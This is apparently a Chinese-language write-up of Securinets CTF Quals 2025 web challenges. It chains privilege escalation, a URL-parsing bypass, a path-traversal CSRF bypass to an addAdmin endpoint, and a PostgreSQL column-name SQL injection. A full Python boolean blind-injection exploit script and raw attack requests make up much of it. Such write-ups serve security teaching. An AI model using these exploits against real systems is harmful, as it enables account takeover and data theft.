securinets ctf quals 2025 web all

Puzzle

我们似乎可以注册更高权限的账号

    @app.route('/confirm-register', methods=['POST'])def confirm_register():# 获取注册表单信息username = request.form['username']email = request.form.get('email', '')# 生成随机密码alphabet = string.ascii_letters + string.digits + '!@#$%^&*'password = ''.join(secrets.choice(alphabet) for _ in range(12))# 获取角色，默认为2（普通用户）role = request.form.get('role', '2')# 角色映射表role_map = {'1': 'editor','2': 'user',}# 禁止注册管理员账号if role == '0':return jsonify({'error': 'Admin registration is not allowed.'}), 403# 检查角色是否合法if role not in role_map:return jsonify({'error': 'Invalid role id.'}), 400# 生成用户唯一IDuid = str(uuid4())

可以看别的用户的密码

    @app.route('/users/<string:target_uuid>')def get_user_details(target_uuid):# 获取用户详细信息（仅管理员和编辑可用）current_uuid = session.get('uuid')if not current_uuid:return jsonify({'error': 'Unauthorized'}), 401current_user = get_user_by_uuid(current_uuid)if not current_user or current_user['role'] not in ('0', '1'):return jsonify({'error': 'Invalid user role'}), 403with sqlite3.connect(DB_FILE) as conn:conn.row_factory = sqlite3.Rowc = conn.cursor()c.execute("""SELECT uuid, username, email, phone_number, role, passwordFROM users WHERE uuid = ?""", (target_uuid,))user = c.fetchone()if not user:return jsonify({'error': 'User not found'}), 404return jsonify({'uuid': user['uuid'],'username': user['username'],'email': user['email'],'phone_number': user['phone_number'],'role': user['role'],'password': user['password']})

任何登录的人都能强行解释请求协作

    @app.route('/collab/accept/<string:request_uuid>', methods=['POST'])def accept_collaboration(request_uuid):# 接受协作请求if not session.get('uuid'):return jsonify({'error': 'Unauthorized'}), 401user = get_user_by_uuid(session['uuid'])if not user:return redirect('/login')if user['role'] == '0':return jsonify({'error': 'Admins cannot collaborate'}), 403try:with sqlite3.connect(DB_FILE) as conn:conn.row_factory = sqlite3.Rowc = conn.cursor()c.execute("SELECT * FROM collab_requests WHERE uuid = ?", (request_uuid,))request = c.fetchone()if not request:return jsonify({'error': 'Request not found'}), 404# 协作文章入库c.execute("""INSERT INTO articles (uuid, title, content, author_uuid, collaborator_uuid)VALUES (?, ?, ?, ?, ?)""", (request['article_uuid'], request['title'], request['content'], request['from_uuid'], request['to_uuid']))c.execute("UPDATE collab_requests SET status = 'accepted' WHERE uuid = ?", (request_uuid,))conn.commit()return jsonify({'message': 'Collaboration accepted'})except Exception as e:return jsonify({'error': str(e)}), 500

request_uuid 会被渲染到前端

<small class="text-muted">Requested by {{ request.requester_name }}</small>
<div><span class="d-none">{{ request.uuid }}</span><button class="btn btn-success btn-sm" onclick="acceptCollaboration('{{ request.uuid }}')">Accept</button>
</div>

主页卡片里渲染了文章作者与协作者的用户 UUID!

                                <div class="card-footer"><a href="/article/{{ article.uuid }}" class="read-more-btn"><span>Read Article</span><i class="fas fa-arrow-right ms-2"></i></a><div class="article-actions"><button class="action-btn" title="Share"><i class="fas fa-share-alt"></i></button><button class="action-btn" title="Bookmark"><i class="fas fa-bookmark"></i></button></div></div><!-- Hidden UUIDs for functionality --><span class="d-none author-uuid">{{ article.author_uuid }}</span>{% if article.collaborator_uuid %}<span class="d-none collaborator-uuid">{{ article.collaborator_uuid }}</span>{% endif %}

获得admin密码

{"email":"admin@securinets.tn","password":"Adm1nooooX333!123!!%","phone_number":"77777777","role":"0","username":"admin","uuid":"9075229d-9bcd-4f8b-9fb0-a484cb3bf914"}

然后/data里有个压缩包,密码在exe里

QEF

S3cret5

这里有sql个注入后端数据库 PostgreSQL 16

// 对输入进行简单的字符过滤，只允许字母、数字、空格、下划线和短横线
function sanitizeInput(input) {return input.replace(/[^a-zA-Z0-9 _-]/g, '');
}// 检查字段名是否在允许的字段列表中
function isValidFilterField(field, allowedFields) {return allowedFields.includes(field);
}// 构造SQL的WHERE子句和参数数组，用于过滤查询
function filterBy(table, filterBy, keyword, paramIndexStart = 1) {if (!filterBy || !keyword) {// 如果没有过滤字段或关键字，则不添加过滤条件return { clause: "", params: [] };}// 构造WHERE子句，使用参数化查询防止SQL注入const clause = ` WHERE ${table}."${filterBy}" LIKE $${paramIndexStart}`;const params = [`%${keyword}%`];return { clause, params };
}// 导出辅助函数
module.exports = { filterBy, sanitizeInput, isValidFilterField };

    // 创建flags表（如果不存在）await pool.query(`CREATE TABLE IF NOT EXISTS flags (id SERIAL PRIMARY KEY,flag TEXT NOT NULL)`);

盲注应该是可以，但是只有管理能用

有个addadmin,但是怎么绕过CSRFtoken呢？

POST http://localhost:3000/admin/addAdmin HTTP/1.1
Host: localhost:3000
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: _BEAMER_USER_ID_TCocQlcK73424=07fa8af0-e1fb-47d6-b3ed-2d9dd118d7a4; _csrf=AltGW0XbdXTdLRGYTtfTfoqg; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Mywicm9sZSI6ImFkbWluIiwiaWF0IjoxNzU5NjI5ODM3LCJleHAiOjE3NTk2MzM0Mzd9.R_zg-y4YeaJv78fawdjioLMqix4buqNQNebn0mfUow8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 78
Content-Type: text/html; charset=utf-8
Date: Sun, 05 Oct 2025 02:38:23 GMT
Etag: W/"4e-3/yT+2wrX2l0t6Lpflr3Ph+2Flw"
X-Powered-By: Express<h1>403 - Invalid CSRF Token</h1><p>Please refresh the page and try again.</p>

report这里可以用解析差异绕

  if (!url || !url.startsWith("http://localhost:3000")) {return res.status(400).send("Invalid URL");}

http://localhost:3000@mojqlab5.requestrepo.com

这里的profileId是可控的，我们甚至可以发到别的地方，但是有什么用呢？

http://localhost:3000/user/profile/?id=1&id=../

    // 解析URL参数，获取profileIdconst urlParams = new URLSearchParams(window.location.search);const profileIds = urlParams.getAll("id");const profileId = profileIds[profileIds.length - 1]; // 访问日志记录fetch("/log/"+profileId, {method: "POST",headers: { "Content-Type": "application/json" },credentials: "include",body: JSON.stringify({userId: "<%= user.id %>", // 当前用户IDaction: "Visited user profile with id=" + profileId, // 访问行为描述_csrf: csrfToken // CSRF令牌})})

发现可以提升admin,不用解析差异了

http://localhost:3000/user/profile/?id=1&id=../admin/addAdmin

POST http://localhost:3000/admin/addAdmin HTTP/1.1
Host: localhost:3000
Content-Length: 135
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
Origin: http://localhost:3000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/user/profile/?id=1&id=../admin/addAdmin
Accept-Encoding: gzip, deflate, br
Cookie: _BEAMER_USER_ID_TCocQlcK73424=07fa8af0-e1fb-47d6-b3ed-2d9dd118d7a4; _csrf=AltGW0XbdXTdLRGYTtfTfoqg; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Mywicm9sZSI6ImFkbWluIiwiaWF0IjoxNzU5NjM1MDIxLCJleHAiOjE3NTk2Mzg2MjF9.56SC63bhzxIXks5YeE8EVZKlS-FE-Oqg78ooznqdYp4
Connection: keep-alive{"userId":"1","action":"Visited user profile with id=../admin/addAdmin","_csrf":"4xfGl6kC-qc1p9FwsWtlw0i7vonTu7YyBSzHR1qm6IkFVdYqO-Jc"}

HTTP/1.1 200 OK
Connection: close
Content-Length: 117
Content-Type: application/json; charset=utf-8
Date: Sun, 05 Oct 2025 03:38:42 GMT
Etag: W/"75-uz7/tpwY7WoLoSMa8SDGN8XtYlc"
X-Powered-By: Express{"message":"Role updated","user":{"id":1,"username":"admin1","description":"Admin account with ID 1","role":"admin"}}

现在获得admin之后怎么盲注获得flag?

SELECT msgs.id, msgs.msg, msgs.type, msgs.createdAt, users.username
FROM msgs
INNER JOIN users ON msgs.userId = users.id
WHERE msgs."msg" = msgs."msg" and $1=$1 and EXISTS (select flag from flags where flag like '{}')--"LIKE $1
ORDER BY msgs.createdAt DESC

msg" = msgs."msg" and $1=$1 and EXISTS (select flag from flags where flag like '{}')--

好了

#!/usr/bin/env python3
# -*- coding: utf-8 -*-"""
基于管理员会话对 /admin/msgs 的列名注入进行布尔盲注，提取 PostgreSQL flags 表中的 flag。工作流程：
1) 使用提供的管理员用户名/密码登录，获取会话 cookie（token）。
2) 每次请求前从 /csrf-token 获取新的 CSRF Token，通过 header 发送（x-csrf-token）。
3) 构造注入：在 filterBy 中闭合列名引号，加入布尔表达式，并用 -- 注释掉后续片段。例如：filterBy = 'msg" = msgs."msg" AND (条件) --'最终 SQL 近似：WHERE msgs."msg" = msgs."msg" AND (条件) --" LIKE $1条件为真 → 返回有数据行；条件为假 → 返回 0 行。通过解析 HTML 中 <tbody> 的 <tr> 数量判断真假。注意：
- 该脚本默认目标为 http://localhost:3000，可通过 --base 修改。
- 登录接口：POST /auth/login 期望 JSON {username, password}。
- 注入接口：POST /admin/msgs 接受 JSON {filterBy, keyword}，需 CSRF 头。
"""import argparse
import sys
import re
import time
import uuid
from typing import Optionalimport requestsclass AdminBlindInjector:def __init__(self, base_url: str, username: str, password: str, timeout: float = 10.0, delay: float = 0.0, verbose: bool = True):self.base_url = base_url.rstrip('/')self.username = usernameself.password = passwordself.timeout = timeoutself.delay = delay  # 每次探测后的可选延时（秒）self.session = requests.Session()self._csrf_cached: Optional[str] = None  # 复用 CSRF 令牌（403 时刷新）self.seed_keyword: Optional[str] = None  # 用于 LIKE 过滤的唯一关键字，减少返回行数self.verbose = verbose# 统计信息self.stats = {"csrf_fetches": 0,"csrf_refreshes": 0,"admin_posts": 0,"admin_posts_403": 0,"probes": 0,"probe_total_ms": 0.0,"message_posts": 0,"login_attempts": 0,}def _vprint(self, msg: str) -> None:if self.verbose:print(msg)def _get_csrf_token(self, force_refresh: bool = False) -> str:"""从 /csrf-token 获取 CSRF Token；默认复用缓存，必要时刷新。"""if self._csrf_cached and not force_refresh:self._vprint("[v] 使用缓存 CSRF Token")return self._csrf_cachedurl = f"{self.base_url}/csrf-token"resp = self.session.get(url, timeout=self.timeout)resp.raise_for_status()data = resp.json()token = data.get("csrfToken")if not token:raise RuntimeError("未获取到 CSRF Token")self._csrf_cached = tokenif force_refresh:self.stats["csrf_refreshes"] += 1self._vprint("[v] 刷新 CSRF Token 成功")else:self.stats["csrf_fetches"] += 1self._vprint("[v] 获取 CSRF Token 成功")return tokendef login(self) -> None:"""使用管理员凭据登录，获取 token Cookie。"""url = f"{self.base_url}/auth/login"csrf_token = self._get_csrf_token()payload = {"username": self.username, "password": self.password}headers = {"Content-Type": "application/json","Accept": "application/json","x-csrf-token": csrf_token,}self.stats["login_attempts"] += 1self._vprint("[v] 正在登录管理端……")resp = self.session.post(url, json=payload, headers=headers, timeout=self.timeout)if resp.status_code != 200:raise RuntimeError(f"登录失败，HTTP {resp.status_code}: {resp.text[:200]}")try:data = resp.json()except Exception:raise RuntimeError(f"登录响应非 JSON: {resp.text[:200]}")if data.get("message") != "Login successful":raise RuntimeError(f"登录失败：{data}")self._vprint("[v] 登录成功，已获取会话 Cookie")def create_message(self, text: str, msg_type: str = "general") -> None:"""创建一条消息，确保 LIKE 仅命中极少行以加速解析。"""url = f"{self.base_url}/msg"csrf_token = self._get_csrf_token()headers = {"Content-Type": "application/json","Accept": "application/json","x-csrf-token": csrf_token,}payload = {"msg": text, "type": msg_type}self.stats["message_posts"] += 1self._vprint(f"[v] 创建消息用于筛选：{text}")resp = self.session.post(url, json=payload, headers=headers, timeout=self.timeout)if resp.status_code == 403:# token 失效则刷新一次headers["x-csrf-token"] = self._get_csrf_token(force_refresh=True)resp = self.session.post(url, json=payload, headers=headers, timeout=self.timeout)self._vprint("[v] 收到 403，已刷新 CSRF 并重试提交消息")if resp.status_code != 200:raise RuntimeError(f"创建消息失败，HTTP {resp.status_code}: {resp.text[:200]}")try:data = resp.json()except Exception:raise RuntimeError(f"创建消息响应非 JSON: {resp.text[:200]}")if data.get("message") != "Msg submitted":raise RuntimeError(f"创建消息失败：{data}")self._vprint("[v] 创建消息成功")def ensure_seed(self, preferred_seed: Optional[str] = None) -> None:"""确保存在唯一关键字的消息；设置 self.seed_keyword 用于后续 LIKE。"""if self.seed_keyword:self._vprint(f"[v] 复用已存在的种子关键字：{self.seed_keyword}")returnseed = preferred_seed or f"seed-{uuid.uuid4().hex[:12]}"self.create_message(seed)self.seed_keyword = seedself._vprint(f"[v] 设定种子关键字：{self.seed_keyword}")def _post_admin_msgs(self, filter_by: str, keyword: Optional[str] = None) -> str:"""对 /admin/msgs 发起 POST 请求并返回 HTML 文本。"""csrf_token = self._get_csrf_token()url = f"{self.base_url}/admin/msgs"headers = {"Content-Type": "application/x-www-form-urlencoded","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Origin": self.base_url,"Referer": f"{self.base_url}/admin/msgs",}payload = {"_csrf": csrf_token,"filterBy": filter_by,"keyword": (keyword if keyword is not None else (self.seed_keyword or "%")),}self.stats["admin_posts"] += 1resp = self.session.post(url, data=payload, headers=headers, timeout=self.timeout)if resp.status_code == 403:# 刷新 CSRF 后重试一次payload["_csrf"] = self._get_csrf_token(force_refresh=True)self.stats["admin_posts_403"] += 1self._vprint("[v] /admin/msgs 返回 403，刷新 CSRF 后重试……")resp = self.session.post(url, data=payload, headers=headers, timeout=self.timeout)if resp.status_code != 200:raise RuntimeError(f"注入请求失败，HTTP {resp.status_code}: {resp.text[:200]}")return resp.text@staticmethoddef _has_rows(html_text: str) -> bool:"""解析 admin-msgs.ejs 渲染后的 <tbody> 部分，判断是否存在至少一行 <tr>。"""tbody_match = re.search(r"<tbody>([\s\S]*?)</tbody>", html_text, re.IGNORECASE)if not tbody_match:# 若模板变化导致匹配不到，则退化为检查是否出现任何数据行的粗略方法return "<td>" in html_texttbody = tbody_match.group(1)return bool(re.search(r"<tr>", tbody, re.IGNORECASE))def probe(self, condition_sql: str) -> bool:"""执行一次布尔探测：构造 filterBy 注入携带 condition_sql，返回 True/False。condition_sql 需要是能在 AND ( ... ) 内独立成立的布尔表达式，例如：EXISTS (SELECT 1 FROM flags WHERE ascii(substring(flag,1,1)) > 64)"""# 通过在列名注入中追加 AND "msg"，让后续模板拼接的 'LIKE $1' 继续生效，# 从而避免参数数量与占位符不匹配的问题；同时将 keyword 设为 '%'，不影响布尔判断。injected_filter = f"msg\" = msgs.\"msg\" AND ({condition_sql}) AND \"msg"t0 = time.perf_counter()html = self._post_admin_msgs(injected_filter)elapsed_ms = (time.perf_counter() - t0) * 1000.0result = self._has_rows(html)self.stats["probes"] += 1self.stats["probe_total_ms"] += elapsed_msself._vprint(f"[v] 探测 #{self.stats['probes']}: {condition_sql} -> {result} ({elapsed_ms:.1f} ms)")if self.delay > 0:time.sleep(self.delay)return resultdef find_flag_length(self, max_cap: int = 512) -> int:"""先指数扩增上界，再二分搜索精确长度（length(flag)）。"""def has_len_ge(n: int) -> bool:cond = f"EXISTS (SELECT 1 FROM flags WHERE length(flag) >= {n})"ok = self.probe(cond)self._vprint(f"[v] 长度判定：length(flag) >= {n} -> {ok}")return ok# 指数扩增找到上界low, high = 0, 1self._vprint("[v] 开始指数扩增上界以估计 flag 长度……")while has_len_ge(high):low = highhigh *= 2if high > max_cap:high = max_capbreakself._vprint(f"[v] 扩增上界：low={low}, high={high}")# 二分锁定长度（寻找最大的 len 使得 len(flag) >= len）self._vprint(f"[v] 二分锁定长度区间：初始 low={low}, high={high}")while low < high:mid = (low + high + 1) // 2ok = has_len_ge(mid)self._vprint(f"[v] 二分：mid={mid} -> {ok}")if ok:low = midelse:high = mid - 1self._vprint(f"[v] 区间更新：low={low}, high={high}")return lowdef find_char_at(self, pos: int, low_ascii: int = 32, high_ascii: int = 126) -> Optional[str]:"""对第 pos 位字符（1 起始）做 ASCII 二分搜索，返回字符；如失败返回 None。"""lo, hi = low_ascii, high_ascii# 先检查是否为空位（若 pos 超出长度，下面探测会不稳定，调用方应先通过长度控制）# 二分：查找最大值 <= hi 的确切字符self._vprint(f"[v] 提取第 {pos} 位字符：ASCII 范围初始 lo={lo}, hi={hi}")while lo < hi:mid = (lo + hi + 1) // 2cond = f"EXISTS (SELECT 1 FROM flags WHERE ascii(substring(flag,{pos},1)) >= {mid})"ok = self.probe(cond)self._vprint(f"[v] 二分字符：mid={mid} -> {ok}")if ok:lo = midelse:hi = mid - 1self._vprint(f"[v] 字符区间更新：lo={lo}, hi={hi}")# 校验得到的 lo 是否匹配confirm = f"EXISTS (SELECT 1 FROM flags WHERE ascii(substring(flag,{pos},1)) = {lo})"if self.probe(confirm):try:ch = chr(lo)self._vprint(f"[v] 第 {pos} 位确认成功：'{ch}' (ASCII {lo})")return chexcept ValueError:return Nonereturn Nonedef extract_flag(self) -> str:length = self.find_flag_length()if length <= 0:raise RuntimeError("未探测到 flag，长度为 0")print(f"[+] flag 长度 = {length}")chars = []for i in range(1, length + 1):ch = self.find_char_at(i)if ch is None:raise RuntimeError(f"第 {i} 位字符提取失败")chars.append(ch)sys.stdout.write(f"\r[+] 进度 {i}/{length}: {''.join(chars)}")sys.stdout.flush()print("")return "".join(chars)def main() -> None:parser = argparse.ArgumentParser(description="Admin 布尔盲注提取 flags.flag")parser.add_argument("-b", "--base", default="http://localhost:3000", help="目标站点基址，如 http://localhost:3000")parser.add_argument("-u", "--username", required=True, help="管理员用户名")parser.add_argument("-p", "--password", required=True, help="管理员密码")parser.add_argument("--timeout", type=float, default=10.0, help="HTTP 超时时间（秒）")parser.add_argument("--delay", type=float, default=0.0, help="每次探测后的延时（秒）")parser.add_argument("--seed-key", default=None, help="用于 LIKE 的唯一关键字；默认为随机生成")parser.add_argument("--quiet", action="store_true", help="静默模式，减少输出")args = parser.parse_args()injector = AdminBlindInjector(base_url=args.base,username=args.username,password=args.password,timeout=args.timeout,delay=args.delay,verbose=not args.quiet,)start_ts = time.perf_counter()print("[*] 正在登录……")injector.login()print("[+] 登录成功")# 创建唯一种子消息，确保 LIKE 仅命中极少行以减少响应体大小print("[*] 正在创建种子消息以加速布尔判定……")injector.ensure_seed(args.seed_key)print(f"[+] 已设置种子关键字: {injector.seed_keyword}")print("[*] 开始盲注提取 flag……")flag = injector.extract_flag()print(f"[+] flag = {flag}")# 执行总结total_ms = (time.perf_counter() - start_ts) * 1000.0avg_probe = (injector.stats["probe_total_ms"] / injector.stats["probes"]) if injector.stats["probes"] else 0.0print("[=] 执行统计：")print(f"    - 登录尝试: {injector.stats['login_attempts']}")print(f"    - CSRF 获取: {injector.stats['csrf_fetches']}, 刷新: {injector.stats['csrf_refreshes']}")print(f"    - 创建消息: {injector.stats['message_posts']}")print(f"    - 管理端请求: {injector.stats['admin_posts']} (403 重试: {injector.stats['admin_posts_403']})")print(f"    - 探测次数: {injector.stats['probes']}，平均耗时: {avg_probe:.1f} ms/次")print(f"    - 总耗时: {total_ms:.1f} ms")if __name__ == "__main__":try:main()except Exception as e:print(f"[-] 发生错误：{e}")sys.exit(1)

python3 exploit_flag_blind.py -b http://web1-79e4a3bc.p1.securinets.tn/ -u A5rZ -p A5rZ

QEF